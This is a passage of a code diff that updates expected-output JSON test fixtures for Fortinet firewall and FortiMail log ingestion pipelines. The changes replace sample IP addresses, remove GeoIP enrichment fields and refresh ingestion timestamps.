"2021-06-29T09:32:55.133740Z", + "ingested": "2021-12-09T13:37:22.357927100Z", "original": "\u003c189\u003edate=2020-04-23 time=12:16:02 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0100022913\" type=\"event\" subtype=\"system\" level=\"notice\" vd=\"root\" eventtime=1587230163375149856 tz=\"-0500\" logdesc=\"FortiCloud server disconnected\" server=\"4.4.4.4\" action=\"disconnect\" reason=\"connection reset\" msg=\"FortiCloud 4.4.4.4 server is disconnected\"", "code": "0100022913", "timezone": "-0500", @@ -2108,23 +1826,8 @@ "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", @@ -2168,7 +1871,7 @@ "related": { "ip": [ "192.168.1.6", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -2188,8 +1891,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133747200Z", - "original": "\u003c188\u003edate=2020-04-23 time=12:14:09 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230049761513222 tz=\"-0500\" srcip=192.168.1.6 srcport=53438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=435234 proto=17 action=\"dns\" policyid=26 policytype=\"policy\" poluuid=\"2345de-b143-52134d8-6654f-4654sdfg16f431\" policyname=\"elasticnewruleset\" service=\"DNS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=54144 crlevel=\"low\"", + "ingested": "2021-12-09T13:37:22.357931400Z", + "original": "\u003c188\u003edate=2020-04-23 time=12:14:09 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230049761513222 tz=\"-0500\" srcip=192.168.1.6 srcport=53438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=435234 proto=17 action=\"dns\" policyid=26 policytype=\"policy\" poluuid=\"2345de-b143-52134d8-6654f-4654sdfg16f431\" policyname=\"elasticnewruleset\" service=\"DNS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=54144 crlevel=\"low\"", "code": "0000000011", "timezone": "-0500", "kind": "event", @@ -2211,25 +1914,10 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 40386, - "organization": { - "name": "Bloomip Inc." - } - }, "port": 6000, "bytes": 65446, "packets": 1045601, - "ip": "8.6.4.7" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", @@ -2241,30 +1929,12 @@ "source": { "nat": { "port": 60964, - "ip": "123.123.123.123" - }, - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-BJ", - "city_name": "Beijing", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Beijing", - "location": { - "lon": 116.3889, - "lat": 39.9288 - } - }, - "as": { - "number": 4808, - "organization": { - "name": "China Unicom Beijing Province Network" - } + "ip": "67.43.156.14" }, "port": 6000, "bytes": 438650, - "ip": "192.168.10.10", - "packets": 723417 + "packets": 723417, + "ip": "192.168.10.10" }, "tags": [ "preserve_original_event" @@ -2299,7 +1969,7 @@ "related": { "ip": [ "192.168.10.10", - "8.6.4.7" + "67.43.156.13" ] }, "fortinet": { @@ -2322,8 +1992,8 @@ }, "event": { "duration": 5462000000000, - "ingested": "2021-06-29T09:32:55.133754500Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:11:51 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000020\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587229911390385486 tz=\"-0500\" srcip=192.168.10.10 srcport=6000 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.6.4.7 dstport=6000 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=4352 proto=17 action=\"accept\" policyid=3426 policytype=\"policy\" poluuid=\"1765de8-5a13-765da73fdsfa1c\" policyname=\"newruleelastic\" service=\"portname\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=123.123.123.123 transport=60964 appcat=\"unknown\" applist=\"policylist\" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728", + "ingested": "2021-12-09T13:37:22.357936400Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:11:51 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0000000020\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587229911390385486 tz=\"-0500\" srcip=192.168.10.10 srcport=6000 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=6000 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=4352 proto=17 action=\"accept\" policyid=3426 policytype=\"policy\" poluuid=\"1765de8-5a13-765da73fdsfa1c\" policyname=\"newruleelastic\" service=\"portname\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=60964 appcat=\"unknown\" applist=\"policylist\" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728", "code": "0000000020", "timezone": "-0500", "kind": "event", @@ -2346,23 +2016,23 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "country_name": "Denmark", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 10.0, + "lat": 56.0 }, - "country_iso_code": "US" + "country_iso_code": "DK" }, "as": { - "number": 15169, + "number": 62121, "organization": { - "name": "Google LLC" + "name": "Christian Ebsen ApS" } }, "bytes": 20, "packets": 0, - "ip": "2001:4860:4860::8888" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "rule": { "ruleset": "someotherpolicy", @@ -2371,23 +2041,23 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "country_name": "Denmark", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 10.0, + "lat": 56.0 }, - "country_iso_code": "US" + "country_iso_code": "DK" }, "as": { - "number": 15169, + "number": 62121, "organization": { - "name": "Google LLC" + "name": "Christian Ebsen ApS" } }, "bytes": 3014, "packets": 4, - "ip": "2001:4860:4860::8888" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "tags": [ "preserve_original_event" @@ -2422,7 +2092,7 @@ }, "related": { "ip": [ - "2001:4860:4860::8888" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "fortinet": { @@ -2440,8 +2110,8 @@ }, "event": { "duration": 42000000000, - "ingested": "2021-06-29T09:32:55.133761800Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:11:48 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229908751434997 tz=\"-0500\" srcip=2001:4860:4860::8888 identifier=0 srcintf=\"port1\" srcintfrole=\"lan\" dstip=2001:4860:4860::8888 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=6542345 proto=58 action=\"accept\" policyid=0 policytype=\"someotherpolicy\" service=\"icmp6/1/0\" trandisp=\"noop\" app=\"icmp6/25/0\" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat=\"unscanned\"", + "ingested": "2021-12-09T13:37:22.357958800Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:11:48 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229908751434997 tz=\"-0500\" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf=\"port1\" srcintfrole=\"lan\" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=6542345 proto=58 action=\"accept\" policyid=0 policytype=\"someotherpolicy\" service=\"icmp6/1/0\" trandisp=\"noop\" app=\"icmp6/25/0\" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat=\"unscanned\"", "code": "0001000014", "timezone": "-0500", "kind": "event", @@ -2464,24 +2134,9 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "bytes": 10, "packets": 40, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "rulepolicy", @@ -2489,18 +2144,9 @@ "id": "0" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, "bytes": 0, "packets": 0, - "ip": "9.7.7.7" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2535,8 +2181,7 @@ }, "related": { "ip": [ - "9.7.7.7", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -2556,8 +2201,8 @@ }, "event": { "duration": 20000000000, - "ingested": "2021-06-29T09:32:55.133769100Z", - "original": "\u003c189\u003edate=2020-04-23 time=13:10:57 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229857509058693 tz=\"-0400\" srcip=9.7.7.7 identifier=61 srcintf=\"wan1\" srcintfrole=\"wan\" dstip=8.8.8.8 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=123 proto=1 action=\"accept\" policyid=0 policytype=\"rulepolicy\" service=\"PING\" dstcountry=\"Norway\" srccountry=\"Netherlands\" trandisp=\"noop\" app=\"PING\" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat=\"unscanned\"", + "ingested": "2021-12-09T13:37:22.357964600Z", + "original": "\u003c189\u003edate=2020-04-23 time=13:10:57 devname=\"newfirewall\" devid=\"newrouterid\" logid=\"0001000014\" type=\"traffic\" subtype=\"local\" level=\"notice\" vd=\"root\" eventtime=1587229857509058693 tz=\"-0400\" srcip=67.43.156.13 identifier=61 srcintf=\"wan1\" srcintfrole=\"wan\" dstip=67.43.156.13 dstintf=\"unknown0\" dstintfrole=\"undefined\" sessionid=123 proto=1 action=\"accept\" policyid=0 policytype=\"rulepolicy\" service=\"PING\" dstcountry=\"Norway\" srccountry=\"Netherlands\" trandisp=\"noop\" app=\"PING\" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat=\"unscanned\"", "code": "0001000014", "timezone": "-0400", "kind": "event", @@ -2652,7 +2297,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133776300Z", + "ingested": "2021-12-09T13:37:22.357970300Z", "original": "\u003c188\u003edate=2020-04-23 time=12:14:39 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000011\" type=\"traffic\" subtype=\"forward\" level=\"warning\" vd=\"root\" eventtime=1587230079841464445 tz=\"-0500\" srcip=192.168.1.1 srcport=62493 srcintf=\"port1\" srcintfrole=\"lan\" dstip=192.168.100.100 dstport=1235 dstintf=\"newinterface\" dstintfrole=\"undefined\" sessionid=54234 proto=17 action=\"ip-conn\" policyid=49 policytype=\"policy\" poluuid=\"654cc-b6542-53467u8-e45234-1566casd35f7836\" policyname=\"oldpolicyname\" user=\"elasticsuper\" authserver=\"FSSO_newfsso\" service=\"udp/12302\" dstcountry=\"Reserved\" srccountry=\"Reserved\" appcat=\"unscanned\" crscore=5 craction=63332144 crlevel=\"low\"", "code": "0000000011", "timezone": "-0500", @@ -2675,25 +2320,10 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 442, "bytes": 77654, "packets": 70, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", @@ -2705,36 +2335,18 @@ "source": { "nat": { "port": 603, - "ip": "23.23.23.23" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.4728, - "lat": 39.0481 - } - }, - "as": { - "number": 14618, - "organization": { - "name": "Amazon.com, Inc." - } + "ip": "67.43.156.14" }, "port": 56603, - "bytes": 923, - "ip": "192.168.50.50", "user": { "name": "elasticuser", "group": { "name": "testgroup" } }, - "packets": 113 + "bytes": 923, + "packets": 113, + "ip": "192.168.50.50" }, "tags": [ "preserve_original_event" @@ -2773,7 +2385,7 @@ ], "ip": [ "192.168.50.50", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -2809,8 +2421,8 @@ }, "event": { "duration": 126000000000, - "ingested": "2021-06-29T09:32:55.133783500Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:14:28 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587230069291463928 tz=\"-0500\" srcip=192.168.50.50 srcport=56603 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=442 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=2345 proto=6 action=\"close\" policyid=2365 policytype=\"policy\" poluuid=\"654644c-b064-fdgdf3425-f003-1234ghdf682e05f\" policyname=\"someoldpolicyname\" user=\"elasticuser\" group=\"testgroup\" authserver=\"FSSO_something\" service=\"HTTPS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=23.23.23.23 transport=603 appid=43540 app=\"Skype.Portals\" appcat=\"Collaboration\" apprisk=\"elevated\" applist=\"someapplist\" appact=\"detected\" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality=\"Seq_num(3), alive, selected\" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction=\"block\" countweb=1 countapp=1 crscore=5 craction=6144 crlevel=\"low\"", + "ingested": "2021-12-09T13:37:22.357976Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:14:28 devname=\"firewall3\" devid=\"oldfwid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" eventtime=1587230069291463928 tz=\"-0500\" srcip=192.168.50.50 srcport=56603 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=442 dstintf=\"wan1\" dstintfrole=\"wan\" sessionid=2345 proto=6 action=\"close\" policyid=2365 policytype=\"policy\" poluuid=\"654644c-b064-fdgdf3425-f003-1234ghdf682e05f\" policyname=\"someoldpolicyname\" user=\"elasticuser\" group=\"testgroup\" authserver=\"FSSO_something\" service=\"HTTPS\" dstcountry=\"Netherlands\" srccountry=\"Reserved\" trandisp=\"snat\" transip=67.43.156.14 transport=603 appid=43540 app=\"Skype.Portals\" appcat=\"Collaboration\" apprisk=\"elevated\" applist=\"someapplist\" appact=\"detected\" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality=\"Seq_num(3), alive, selected\" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction=\"block\" countweb=1 countapp=1 crscore=5 craction=6144 crlevel=\"low\"", "code": "0000000013", "timezone": "-0500", "kind": "event", @@ -2833,23 +2445,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "Europe", - "country_name": "France", - "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" - }, - "as": { - "number": 41690, - "organization": { - "name": "Dailymotion S.A." - } - }, "port": 443, - "ip": "195.8.215.136" + "ip": "67.43.156.14" }, "rule": { "ruleset": "block-social.media", @@ -2896,7 +2493,7 @@ "related": { "ip": [ "10.1.100.22", - "195.8.215.136" + "67.43.156.14" ] }, "fortinet": { @@ -2927,8 +2524,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133791Z", - "original": "\u003c190\u003edate=2019-05-15 time=18:03:36 logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"app-ctrl-all\" level=\"information\" vd=\"root\" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf=\"port10\" srcintfrole=\"lan\" dstintf=\"port9\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" direction=\"outgoing\" policyid=1 sessionid=4414 applist=\"block-social.media\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" action=\"pass\" hostname=\"www.dailymotion.com\" incidentserialno=1962906680 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"*.dailymotion.com\" scertissuer=\"DigiCert SHA2 High Assurance Server CA\"", + "ingested": "2021-12-09T13:37:22.357981800Z", + "original": "\u003c190\u003edate=2019-05-15 time=18:03:36 logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"app-ctrl-all\" level=\"information\" vd=\"root\" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf=\"port10\" srcintfrole=\"lan\" dstintf=\"port9\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" direction=\"outgoing\" policyid=1 sessionid=4414 applist=\"block-social.media\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" action=\"pass\" hostname=\"www.dailymotion.com\" incidentserialno=1962906680 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"*.dailymotion.com\" scertissuer=\"DigiCert SHA2 High Assurance Server CA\"", "code": "1059028704", "kind": "event", "start": "2019-05-16T01:03:35.000Z", @@ -2947,23 +2544,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 500, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "description": "Progress IPsec phase 1" @@ -2993,7 +2575,7 @@ "related": { "ip": [ "10.10.10.10", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -3014,8 +2596,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133798400Z", - "original": "\u003c190\u003edate=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type=\"event\" subtype=vpn level=notice vd=root logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf=\"port1\" cookies=\"125cbf9ee8349965/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"P1_Test\" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK", + "ingested": "2021-12-09T13:37:22.357987500Z", + "original": "\u003c190\u003edate=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type=\"event\" subtype=vpn level=notice vd=root logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf=\"port1\" cookies=\"125cbf9ee8349965/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"P1_Test\" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK", "code": "0101037127", "kind": "event", "type": [ @@ -3057,7 +2639,7 @@ "message": "Updated tag FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-06-29T09:32:55.133805700Z", + "ingested": "2021-12-09T13:37:22.357993200Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880370858 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", @@ -3097,7 +2679,7 @@ "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-06-29T09:32:55.133813Z", + "ingested": "2021-12-09T13:37:22.357998900Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880455433 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", @@ -3137,7 +2719,7 @@ "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-06-29T09:32:55.133820200Z", + "ingested": "2021-12-09T13:37:22.358004900Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880744919 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", @@ -3177,7 +2759,7 @@ "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-06-29T09:32:55.133827500Z", + "ingested": "2021-12-09T13:37:22.358010500Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880784143 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", @@ -3217,7 +2799,7 @@ "message": "Updated tag FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-06-29T09:32:55.133834800Z", + "ingested": "2021-12-09T13:37:22.358016200Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900027938 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", @@ -3257,7 +2839,7 @@ "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-06-29T09:32:55.133842200Z", + "ingested": "2021-12-09T13:37:22.358023800Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900167367 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", @@ -3297,7 +2879,7 @@ "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-06-29T09:32:55.133849300Z", + "ingested": "2021-12-09T13:37:22.358027300Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900749585 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", @@ -3337,7 +2919,7 @@ "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-06-29T09:32:55.133856500Z", + "ingested": "2021-12-09T13:37:22.358032Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900961834 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", diff --git a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json index 5d63c4cf3e0..db1073d9162 100644 --- a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "date=2016-1-29 time=06:09:59 device_id=pexe log_id=nes log_part=eab type=event subtype=update pri=high msg=\"boNemoe\"", "event": { - "ingested": "2021-06-29T09:33:00.526473300Z" + "ingested": "2021-12-09T13:37:30.095994800Z" }, "tags": [ "preserve_original_event" @@ -18,7 +18,7 @@ }, "message": "date=2016-2-12 time=13:12:33 device_id=ehend log_id=ritquiin log_part=umqui type=virus subtype=infected pri=very-high from=\"mest\" to=enderitq client_name=\"sperna884.internal.domain\" client_ip=\"10.165.201.71\" session_id=\"pisciv\" msg=\"uii\"", "event": { - "ingested": "2021-06-29T09:33:00.526485200Z" + "ingested": "2021-12-09T13:37:30.096004200Z" }, "tags": [ "preserve_original_event" @@ -30,7 +30,7 @@ }, "message": "date=2016-2-26 time=20:15:08 device_id=doeiu log_id=nia log_part=olupt type=event subtype=config pri=low user=quipexe ui=alo(10.212.18.145) module=umdo submodule=itessequ msg=vol", "event": { - "ingested": "2021-06-29T09:33:00.526493Z" + "ingested": "2021-12-09T13:37:30.096010600Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "date=2016-3-12 time=03:17:42 device_id=uipexea log_id=tatio log_part=minim type=event subtype=pop3 pri=high user=ceroinBC ui=ratvolup action=deny status=iatu msg=\"ionofde\"", "event": { - "ingested": "2021-06-29T09:33:00.526500400Z" + "ingested": "2021-12-09T13:37:30.096016700Z" }, "tags": [ "preserve_original_event" @@ -54,7 +54,7 @@ }, "message": "date=2016-3-26 time=10:20:16 device_id=itati log_id=mfu log_part=uid type=event subtype=pop3 pri=very-high user=obeataev ui=lor action=block status=autfu msg=\"natura\"", "event": { - "ingested": "2021-06-29T09:33:00.526507800Z" + "ingested": "2021-12-09T13:37:30.096022700Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "date=2016-4-9 time=17:22:51 device_id=llamcorp log_id=ari log_part=eataevit type=event subtype=system pri=high user=iam ui=mqua action=allow status=olab msg=mquisnos", "event": { - "ingested": "2021-06-29T09:33:00.526515100Z" + "ingested": "2021-12-09T13:37:30.096028800Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "date=2016-4-24 time=00:25:25 device_id=enimad log_id=incididu log_part=eci type=virus pri=very-high from=tenbyCic to=boree src=10.98.69.43 session_id=\"iinea\" msg=ipit", "event": { - "ingested": "2021-06-29T09:33:00.526522700Z" + "ingested": "2021-12-09T13:37:30.096034900Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "date=2016-5-8 time=07:27:59 device_id=taliqu log_id=temUten log_part=ccusan type=virus subtype=infected pri=low from=\"Ciceroi\" to=\"aveniam\" client_name=\"uradi7307.internal.corp\" client_ip=\"10.118.96.139\" session_id=\"sitas\" msg=ehenderi", "event": { - "ingested": "2021-06-29T09:33:00.526526800Z" + "ingested": "2021-12-09T13:37:30.096041Z" }, "tags": [ "preserve_original_event" @@ -102,7 +102,7 @@ }, "message": "date=2016-5-22 time=14:30:33 device_id=smo log_id=litessec log_part=emporinc type=event subtype=pop3 pri=very-high 